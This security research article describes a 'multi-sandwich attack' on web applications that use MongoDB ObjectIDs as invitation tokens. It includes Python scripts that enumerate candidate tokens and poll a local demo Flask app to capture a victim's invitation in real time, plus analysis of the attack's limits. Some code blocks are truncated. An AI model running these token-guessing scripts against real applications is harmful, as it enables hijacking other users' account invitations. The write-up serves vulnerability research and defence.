[EN] Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack



In the previous article, we saw how to exploit a web application using time-based data as its secret. To do this, we necessarily needed to control the time variable.

In the password reset scenario, the attacker made the request himself in place of the victim in order to find out a date near to the date of the request. We therefore had control over the time variable.

However, other scenarios are possible, particularly with MongoDB Object IDs. In this article, we’re going to present a new scenario for obtaining an impact without needing to know the temporality.

Table of contents

I - Context

I.1 - Logical continuation of my research

During my research into time-based tokens, I listed the various features based on the scenario of a secret token sent by e-mail. In this list, we can find the scenario of an application allowing a company administrator to invite new users by sending a token by e-mail. The new user can then create an account using the link received.

During my analysis, I initially set this scenario aside because my open source tool Reset Tolkien requires an approximation of the token generation date. However, when the administrator invites a user, the attacker is unable to determine when the token was generated. We have no control over the time value.

It is therefore logical to want to explore the possibility of carrying out attacks without having to know the approximate generation date. The aim will therefore be to develop methods for validating tokens in real time.

However, when the MongoDB Object ID token format was discovered, a new exploitation scenario was envisaged.

I.2 - The invitation feature

This feature enables a user to be invited to join the company’s account by means of a secret sent by e-mail to the newly invited user. In order to have an impact, an attacker must guess the token before the victim proceeds to create their account.

If the hypothesis that the token is generated from time is true, then an attacker knowing the approximate invitation date would be able to carry out an attack to create the victim’s account for them, just as in the previous article.

First scenario

However, in this scenario, the prerequisite of knowing the token generation date is too circumstantial.

It seems that the severity of this scenario is not sufficient. We therefore need to review this scenario in order to obtain an impact without knowing the approximate date of the invitation.

The objective would be to be able to monitor, in real time, the tokens generated by the application to create the account in place of the victim.

I.3 - MongoDB Object ID


As mentioned in my previous article, the Object ID tokens generated by MongoDB are made up of three pieces of information:

def MongoDB_ObjectID(timestamp, process, counter):
    return "%08x%10x%06x" % (

def reverse_MongoDB_ObjectID(token):
    timestamp = int(token[0:8], 16)
    process = int(token[8:18], 16)
    counter = int(token[18:24], 16)
    return timestamp, process, counter

Assuming that the token sent by e-mail uses this format, it would be possible to use a sandwich attack to obtain the tokens contained in a time frame if the date on which the token was generated is known approximately.

Since this format is based on a timestamp in seconds, at first sight the complexity of this token format allows us to generate all the possible tokens at a time t and to confirm them in real time.

II - Sandwich attack without knowing the generation date

II.1 - First attempt - Sandwich attack with a long time frame

We therefore attempt a sandwich attack over a long time frame, to maximise the chances of finding a valid invitation:

Second scenario

Using this scenario, we could retrieve all the invitations generated by the application during the monitored time frame.

The operating procedure would then be as follows:

If this scenario is confirmed, we would be able to monitor all the application’s invitations in real time (with a latency corresponding to the size of the time frame).

II.2 - First attempt - Complexity failure

In the realistic context of a vulnerable application, we take a time window of 50 minutes between two tokens, and calculate the number of possible tokens.

The objective is to evaluate whether the tokens calculated can be verified during a second time frame of 50 minutes. In this case, real-time token monitoring could be envisaged.

tokens = [
    "65c8fe61e6c4e22c969701f0", # Generated at 2024-02-11T18:05:37
    "65c90a20e6c4e22c96970373" # Generated at 2024-02-11T18:55:44

timestamp_token1, process_token1, counter_token1 = reverse_MongoDB_ObjectID(tokens[0])
timestamp_token2, process_token2, counter_token2 = reverse_MongoDB_ObjectID(tokens[-1])
print(f"{tokens[0]}: {timestamp_token1} - {process_token1} - {counter_token1}")
print(f"{tokens[-1]}: {timestamp_token2} - {process_token2} - {counter_token2}")
# 65c8fe61e6c4e22c969701f0: 1707671137 - 991145634966 - 9896432
# 65c90a20e6c4e22c96970373: 1707674144 - 991145634966 - 9896819

diff_timestamp = timestamp_token2 - timestamp_token1
diff_counter = counter_token2 - counter_token1
possible_tokens_len = diff_timestamp * diff_counter
print(f"Time: {diff_timestamp} seconds - Possible memory access values : {diff_counter}")
print(f"Number of possible tokens : {possible_tokens_len}")
# Time: 3007 seconds - Possible memory access values : 387
# Number of possible tokens : 1163709
print(f"Number of requests per second to verify all tokens: {int(possible_tokens_len / diff_timestamp)} req/s")
# Number of requests per second to verify all tokens: 386 req/s

To operate in real time, we need to be able to check all the possible tokens in the first time frame during the interval of the second time frame.

This would require us to be able to check all the tokens at a rate of 386 requests per second.

Which doesn’t seem feasible at the moment.

II.3 - Second attempt - Sandwich attack with multiple short time frames

It is possible to plot the evolution of the token values on a two-dimensional graph, with the evolution of the graph corresponding to the timestamp value and the evolution of the counter:


The set of possible tokens is included in the area of the rectangle delimited by the counter values and by the two time values which bound the time frame. What happens if we retrieve an intermediate token within this time frame?


If we retrieve an intermediate value token1>2, it is possible to check the value of the counter c1>2 for a specific time t1>2. We then halve the number of possible tokens. By continuing to add intermediate tokens between each sandwich, we continue to reduce the number of possible tokens:


By generating several short time frames sequentially, instead of a single long time frame, we reduce the number of possible tokens. We still need to determine the optimised value for the size of the short time frames in order to make our attack scenario feasible.

II.4 - Second attempt - Size of short time frames

It is possible to calculate this artificially by taking our two previously generated tokens and adding dummy intermediate tokens. To do this, we’ll introduce an intermediate token between each token in the list to artificially halve the size of the short time frames.

import math

# Generate factice intermediate token from average values
def generate_mid_token(token1, token2):
    t1, p1, c1 = reverse_MongoDB_ObjectID(token1)
    t2, p2, c2 = reverse_MongoDB_ObjectID(token2)
    if p1 != p2:
        print("Fail: not the same process!")
    new_timestamp = t1 + math.floor((t2 - t1) / 2)
    new_counter = c1 + math.floor((c2 - c1) / 2)
    return MongoDB_ObjectID(new_timestamp, p1, new_counter)

# Generates an intermediate token between each provided token
def generate_tokens_via_mid_token(tokens):
    new_tokens = []
    for i in range(0, len(tokens) - 1):
        token = generate_mid_token(tokens[i], tokens[i + 1])
    return new_tokens

# Calculates the number of possible tokens between each provided token
def compute_possible_tokens(tokens):
    diff_tokens = []
    for i in range(0, len(tokens) - 1):
        t1, _, c1 = reverse_MongoDB_ObjectID(tokens[i])
        t2, _, c2 = reverse_MongoDB_ObjectID(tokens[i + 1])
        diff_tokens.append((t2 - t1 + 1) * (c2 - c1 - 1))
    return sum(diff_tokens)

max_interval = timestamp_token2 - timestamp_token1
for i in range(0, 9):
        f"Generated token during {math.floor(max_interval/60)}min : {len(tokens)} "
        + f"one generated token for each {round(max_interval / (len(tokens) - 1),2)}sec"
        + f" - Possible tokens size : {compute_possible_tokens(tokens)}"
        + f" i.e. {round(compute_possible_tokens(tokens)/(max_interval), 2)} req/sec"
    tokens = generate_tokens_via_mid_token(tokens)
Generated token during 50min : 2 -> one generated token for each 3007.0sec interval - Possible tokens size : 1161088 i.e. 386.13 req/sec
Generated token during 50min : 3 -> one generated token for each 1503.5sec interval - Possible tokens size : 579233 i.e. 192.63 req/sec
Generated token during 50min : 5 -> one generated token for each 751.75sec interval - Possible tokens size : 288304 i.e. 95.88 req/sec
Generated token during 50min : 9 -> one generated token for each 375.88sec interval - Possible tokens size : 142836 i.e. 47.5 req/sec
Generated token during 50min : 17 -> one generated token for each 187.94sec interval - Possible tokens size : 70096 i.e. 23.31 req/sec
Generated token during 50min : 33 -> one generated token for each 93.97sec interval - Possible tokens size : 33714 i.e. 11.21 req/sec
Generated token during 50min : 65 -> one generated token for each 46.98sec interval - Possible tokens size : 15499 i.e. 5.15 req/sec
Generated token during 50min : 129 -> one generated token for each 23.49sec interval - Possible tokens size : 6345 i.e. 2.11 req/sec
Generated token during 50min : 257 -> one generated token for each 11.75sec interval - Possible tokens size : 1703 i.e. 0.57 req/sec

According to our estimates, by generating a time frame every ~10 seconds, we would be able to verify all possible tokens in real time.

III - Case study

To test our scenarios, we’re going to take the example of a web application and run our scenarios to put our observations into practice and test our hypotheses against reality.

III.1 - Example of a web application

Let’s imagine that a web application implements the functionality of inviting users to create an account by e-mail, using MongoDB Object ID format as the secret. Here is an example of a web application using flask and pymongo:

from flask import Flask, request, redirect
from pymongo import MongoClient
from bson.objectid import ObjectId

VICTIM_EMAIL = "victim@example.com"

app = Flask(__name__)
db = MongoClient("mongodb://admin:admin@mongodb:27017")

# Store the token in database with the provided email
def store_in_db(email):
    reset = db["reset"]
    tokens = reset["tokens"]
    if tokens.find_one({"email": email}):
        tokens.delete_one({"email": email})
    return tokens.insert_one({"email": email}).inserted_id

def clear_token(token):
    reset = db["reset"]
    tokens = reset["tokens"]
    tokens.delete_one({"_id": ObjectId(token)})

# Verify the validity of provided token - the token is deleted from the database after usage
def verify(token):
    reset = db["reset"]
    tokens = reset["tokens"]
    db_token = tokens.find_one({"_id": ObjectId(token)})
    email = None
    if db_token:
        email = db_token["email"]
    return email

@app.route("/clear", methods=["GET"])
def clear():
    token = request.args.get("token", None)
    # Verify
    if token:
        if verify(token):
            return "Token used!"
        return "Expired token!"
    return redirect("invite")

@app.route("/", methods=["GET"])
def index():
    return redirect("invite")

@app.route("/invite", methods=["GET"])
def invite():
    # Verify
    token = request.args.get("token", None)
    if token:
        email = verify(token)
        if email:
            return (
                f"You are invite with {email}! <a href='/clear?token={token}'>Clear</a>"
        return "Expired token!"

    # Generate
    email = request.args.get("email", None)
    if email:
        token = store_in_db(email)
        if token:
            if email == VICTIM_EMAIL:
                return f"Email sent to {email}."
            return f"Email sent to {email}: <a id='token' href='/invite?token={token}'>{token}</a>"
        return "Error"

    # Provide form
    return "<html><body><form><label for='email'>Email: </label><input name='email'></input></form>"

@app.route("/trigger", methods=["GET"])
def trigger():
    if store_in_db(VICTIM_EMAIL):
        return "Invitation from administrator to victim triggered"
    return "Error"

if __name__ == "__main__":

This application implements 5 functionalities on different routes:

We host this web server using a Dockerfile:

FROM python:3.10-alpine AS builder

RUN pip3 install pymongo flask

COPY . .

CMD ["python3", "server.py"]

Then we’ll set up a MongoDB server connected to run our application locally on port 8000 via docker-compose:

version: '3.8'
      context: src
      target: builder
      - 8000:9090
      - ./src:/src
      - mongodb

    image: mongo:7.0.11
      - "27017:27017"

III.2 - Exploitation

We are developing a script for the main uses of this application, which will make it possible to generate, retrieve and verify a token:

import requests
from bs4 import BeautifulSoup

domain = "http://localhost:8000/"

# Retrieve the token from HTML page
def get_token(content):
    soup = BeautifulSoup(content, "html.parser")
    return soup.find(id="token").attrs["href"].split("?")[1].split("=")[1]

# Generate a token via invitation and return the token
def invite(email):
    print(f"Invite {email}...")
    r = requests.get(f"{domain}/invite?email={email}")
    if r.ok:
        return get_token(r.text)

# Oracle to verify the validity of the provided token
def verify(token):
    r = requests.get(f"{domain}/invite?token={token}")
    if r.ok and "Clear" in r.text:
        return True
    return False

if __name__ == "__main__":
    token = invite("test@example.com")
    print(f"Token: {token} -> verify:{verify(token)}")
    # Invite test@example.com...
    # Token: 66900b221dac7a1d51af6788 -> verify:True
# Returns a list of all the tokens contained in the interval between the two provided tokens.
def generate_range(token1, token2):
    timestamp_token1, process_token1, counter_token1 = reverse_MongoDB_ObjectID(token1)
    timestamp_token2, process_token2, counter_token2 = reverse_MongoDB_ObjectID(token2)
    if process_token1 != process_token2:
        print("Fail: not the same process!")
    new_process = process_token1
    diff_timestamp = timestamp_token2 - timestamp_token1
    diff_counter = counter_token2 - counter_token1
    possible_tokens = []
    for t in range(0, diff_timestamp + 1):
        new_timestamp = timestamp_token1 + t
        for count in range(1, diff_counter + 1):
            new_counter = counter_token1 + count
            new_token = MongoDB_ObjectID(new_timestamp, new_process, new_counter)
            if not (count == diff_counter and t == diff_timestamp):
    return possible_tokens

We then perform our first classic sandwich attack scenario: we generate two tokens, then check all the intermediate tokens. If one of the tokens has been generated during this interval, then we will detect it.

VICTIM_EMAIL = "victim@example.com"

# Trigger victim email to simulate administrator action
def trigger():
    print(f"Trigger {VICTIM_EMAIL}...")
    r = requests.get(f"{domain}/invite?email={VICTIM_EMAIL}")
    return r.ok

# Verify the validity of all tokens contained in the interval between the two provided tokens.
def verify_all(token1, token2):
    tokens = generate_range(token1, token2)
    for token in tokens:
        if verify(token):
            print(f"[!] {token}")
    print(f"{len(tokens)} checked")

if __name__ == "__main__":
    import time
    token1 = invite("test@example.com")
    print(f"Token 1: {token1} -> verify:{verify(token1)}")
    token3 = invite("test2@example.com")
    print(f"Token 2: {token2} -> verify:{verify(token2)}")
    verify_all(token1, token2)
    # Invite test@example.com...
    # Token 1: 66900d9d1dac7a1d51af6790 -> verify:True
    # Trigger victim@example.com...
    # Invite test3@example.com...
    # Token 3: 66900da71dac7a1d51af6792 -> verify:True
    # [!] 66900da21dac7a1d51af6791
    # 21 checked

We now have everything we need to perform our first multi-sandwich attack scenario. We continuously generate time frames of 10 seconds. As soon as a time frame is bounded by the two tokens, we check the tokens in the interval in parallel.

import time
import threading

def native_exploit(email, delay):
    token1 = invite(email)
    token2 = token1
    while True:
        token1 = token2
        token2 = invite(email)
        thread = threading.Thread(
            args=(token1, token2),

if __name__ == "__main__":
    delay = 10
    thread = threading.Thread(
    time.sleep(delay + delay / 2)
    # Invite test@example.com...
    # Invite test@example.com...
    # 10 checked
    # Trigger victim@example.com...
    # Invite test@example.com...
    # [!] 66901334fb7c368de8c075c0
    # 21 checked

We now have a method for monitoring the web application in real time in order to retrieve (with a latency of 10 seconds in our example) the tokens generated for new account invitations.

IV - Optimising the number of requests to the oracle

For this scenario, it is necessary to make a large number of requests to the target application in order to check the tokens calculated. For technical reasons (and/or discretion), it may be difficult, if not impossible, to implement this scenario.

IV.1 - Third attempt - Monitoring the evolution of the Object ID counter

When a new invitation is issued, a token is generated. The Object ID format includes a time-based part that we try to guess based on the current time. But the Object ID format also includes a counter. This is incremented every time a new memory access is used.

So if we can track the token, we can also track the number of memory accesses used. We therefore have the opportunity to track new memory accesses in real time, and therefore to track invitation token generation in real time.

If this hypothesis is confirmed, all we need to do is follow the evolution of this counter to determine if a new invitation token has been generated.

IV.2 - Third attempt - Scenario optimised for number of requests

To monitor the evolution of the counter, we’re going to carry out the same monitoring via short time frames, but this time we’ll only check the tokens contained in a time frame whose counter has been incremented in an unusual way.

Between two sequentially generated tokens, the counter should only be incremented once. If this is the case, there is no need to check the tokens. If not, this indicates that another token was generated during this time frame. We must then check all the tokens to recover the valid token.

def compute_diff_counter(token1, token2):
    _, process_token1, counter_token1 = reverse_MongoDB_ObjectID(token1)
    _, process_token2, counter_token2 = reverse_MongoDB_ObjectID(token2)
    if process_token1 != process_token2:
        print("Fail: not the same process!")
    return counter_token2 - counter_token1

def monitored_exploit(email, delay):
    token1 = invite(email)
    token2 = token1
    while True:
        token1 = token2
        token2 = invite(email)
        if compute_diff_counter(token1, token2) > 1:
            print(f"[+] Need to verify")
            thread = threading.Thread(
                args=(token1, token2),

if __name__ == "__main__":
    delay = 10
    thread = threading.Thread(
        args=("test@example.com", delay),
    time.sleep(delay + delay / 2)
    # Invite test@example.com...
    # Invite test@example.com...
    # Trigger victim@example.com...
    # Invite test@example.com...
    # [+] Need to verify
    # [!] 6690570dfb7c368de8c075d7
    # 21 checked

Using this scenario, it is possible to passively monitor the generation of tokens, considering that the generation of an invitation at each of the time frames set up is a legitimate and non-intrusive action for the targeted application.

The part of the exploitation that consumes the most resources is only performed when an anomaly is detected, i.e. when the counter is incremented in an unusual way. In this case, only tokens calculated from the suspicious time frame are verified, which limits the number of verification requests to a minimum.

V - Confrontation with reality

V.1 - Multi-instance

MongoDB Object IDs also include information specific to the machine and process being used. In addition, the counter value is incremented only for the current machine/process. This variable must therefore be taken into account for the above scenarios to work.

In the case of a multi-instance web application, it will be necessary to perform the scenarios by generating several tokens at the same time in order to increase the chances of generating at least one token from each of the processes used by the web application.

The counter monitoring scenario would then depend on the successful generation of a token for each process. However, during my tests on vulnerable applications, I had no problem generating a token for each process each time by performing parallel token generation.

V.2 - Uncontrolled counter evolution

The counter value changes each time memory is added to the MongoDB database. If the database is used to store other types of information, such as activity logs for example, the counter will evolve in a way that is not controlled by the attacker.

If a large amount of information is regularly stored by the application, invitation monitoring becomes ineffective. In fact, it will be necessary to check as regularly as information is stored in the database. If the counter changes at least once per time frame, then it will be necessary to carry out a systematic check for each time frame.

In the case where the MongoDB database is used to log, the attack becomes impossible for another reason: during the token verification procedure, a large number of requests are made and then logged, causing the counter to increase. The larger the counter, the greater the number of possible tokens, resulting in exponential complexity that makes it impossible to find the valid token.

It’s as if we were sabotaging ourselves: the more we check, the more we have to check

VI - Conclusion

Thanks to our attack scenario, it is possible to exploit the invitation feature and more generally to exploit attack scenarios where it is not necessary to know the generation date of a token in order to retrieve its secret.

Monitoring the generation of MongoDB Object ID tokens is made possible by the format of this token. By monitoring the evolution of the counter contained in this format, it is possible to detect the generation of an invitation token by another user and to guess it.

However, this exploitation is conditional on the application’s use of the database. If the MongoDB database is used for another reason and the attacker is not able to control or predict the evolution of the counter, the success of the scenario is not guaranteed.